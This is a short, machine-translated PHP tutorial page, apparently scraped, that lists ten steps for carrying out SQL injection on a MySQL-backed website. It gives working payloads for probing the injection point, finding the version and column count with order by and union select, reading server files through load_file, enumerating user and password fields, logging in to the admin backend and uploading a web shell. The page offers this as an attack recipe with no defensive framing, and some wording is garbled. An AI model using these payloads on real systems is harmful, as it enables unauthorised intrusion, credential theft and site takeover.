Home >Backend Development >PHP Tutorial >Introduction to 10 ways to determine injection in PHP_PHP Tutorial

Introduction to 10 ways to determine injection in PHP_PHP Tutorial

WBOY
WBOYOriginal
2016-07-13 17:42:25963browse

1. Determine whether there is injection, add; and 1=1; and 1=2

2. Determine the version and ord(mid(version(),1,1))>51 /* Return to normal instructions It is version 4.0 or above, you can use union to query

3. Use the order by field, add order by 10 after the URL /* If the return is normal, the field is greater than 10

4. Use union again To query the exact fields, such as: and 1=2 union select 1,2,3,...../* until normal is returned, indicating that the accurate number of fields has been guessed. If spaces are filtered, you can use /**/ instead.

5. Determine whether the database connection account has write permissions, and (select count(*) from mysql.user)>0 /*If the result returns an error, then we can only guess the administrator account and password .

6. If the return is normal, you can select 1,2,3,4,5,6,load_file through and 1=2 union (char (ascii value of the file path, separated by commas)), 8,9,10 /* Note: load_file
(char (ascii value of file path, separated by commas)) can also be in hexadecimal. In this way, you can read the configuration file and find the database connection, etc.

7. First guess the user table, such as: and 1=2 union select 1,2,3,4,5,6.... from user /* If the return is normal, this table exists.

8. Guess the fields if you know the table, and 1=2 union select 1,username,3,4,5,6.... from user/*If the field content is displayed in the 2 field then There are some fields.

9. In the same way, guess the password field again. If the guess is successful, log in to the backend.

10. Log in to the backend and upload the shell

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/486055.htmlTechArticle1. Determine whether there is injection, add; and 1=1;and 1=2 2. Determine the version and ord (mid(version(),1,1))51 /* The normal return description is version 4.0 or above. You can use union to query 3. Use the order by violent field,...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn